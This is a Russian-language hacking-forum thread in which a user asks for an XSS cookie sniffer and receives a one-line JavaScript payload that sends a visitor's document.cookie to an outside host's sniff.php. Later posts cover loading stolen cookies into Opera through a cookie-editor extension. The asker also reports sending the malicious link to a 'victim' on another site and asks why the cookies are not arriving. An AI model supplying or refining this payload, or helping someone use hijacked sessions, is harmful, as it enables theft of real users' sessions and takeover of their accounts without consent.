HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
Перезагрузить страницу Подскажите сниффер
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.05.2021, 06:45
amanow
Guest
Сообщений: n/a
Провел на форуме:
3169

Репутация: 0
По умолчанию
Здравствуйте уважаемые форумчане может есть у кого нибудь снифер для кражи куки через хсс поделитесь пж заранее спасибо
 
Ответить с цитированием

  #2  
Старый 21.05.2021, 11:32
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
Отправляем на него:

img = new Image();img.src="https://site.com/sniff.php?cookie="+document.cookie;
 
Ответить с цитированием

  #3  
Старый 21.05.2021, 13:23
amanow
Guest
Сообщений: n/a
Провел на форуме:
3169

Репутация: 0
По умолчанию
Цитата:
Сообщение от winstrool  
winstrool said:

PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
Отправляем на него:
img = new Image();img.src="
https://site.com/sniff.php?cookie=
"+document.cookie;
Большое спасибо получилось ) Скажите пожалуйста куда подставлять полученные куки в opere
 
Ответить с цитированием

  #4  
Старый 21.05.2021, 14:05
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Цитата:
Сообщение от amanow  
amanow said:

Большое спасибо получилось ) Скажите пожалуйста куда подставлять полученные куки в opere
Такие простые вопросы можно и за гуглить, если не можете найти ответ потом уже спрашивайте на форуме, или сразу задавайте вопрос в развернутом виде

___addons.opera.com/ru/extensions/details/edit-this-cookie/
 
Ответить с цитированием

  #5  
Старый 22.05.2021, 08:13
amanow
Guest
Сообщений: n/a
Провел на форуме:
3169

Репутация: 0
По умолчанию
Цитата:
Сообщение от winstrool  
winstrool said:

Такие простые вопросы можно и за гуглить, если не можете найти ответ потом уже спрашивайте на форуме, или сразу задавайте вопрос в развернутом виде
___addons.opera.com/ru/extensions/details/edit-this-cookie/
Я извиняюсь не подскажите есть сайт на котором есть xss когда я пишу alert(document.cookie) он мне показыват мои куки но когда я пишу ваш код и даю жертве ссылку и он по ней переходит его куки мне на хост не приходят почему
 
Ответить с цитированием

  #6  
Старый 22.05.2021, 14:43
amanow
Guest
Сообщений: n/a
Провел на форуме:
3169

Репутация: 0
По умолчанию
хоть кто нибудь помогите пожалуйста
 
Ответить с цитированием

  #7  
Старый 22.05.2021, 15:11
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию
Я же выше писал:

Цитата:
Сообщение от None  
img = new Image();img.src="
https://site.com/sniff.php?cookie=
"+document.cookie;
Ну а дальше по ситуации, смотря какие обстоятельства...
 
Ответить с цитированием

  #8  
Старый 22.05.2021, 15:29
amanow
Guest
Сообщений: n/a
Провел на форуме:
3169

Репутация: 0
По умолчанию
я создал на хосте скрипт snif.php поставил ваш код в этот файл проверил скрпит на своем сайте где тоже есть xss куки пришли НО когда я даю жертве на другом сайте ссылку на уязвимую страницу куки не приходят ) подумал может нету тут xss закрыли и просто ради интиреса на форуме того сайта написал alert(document.cookie) сайт показывает мне мои куки
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ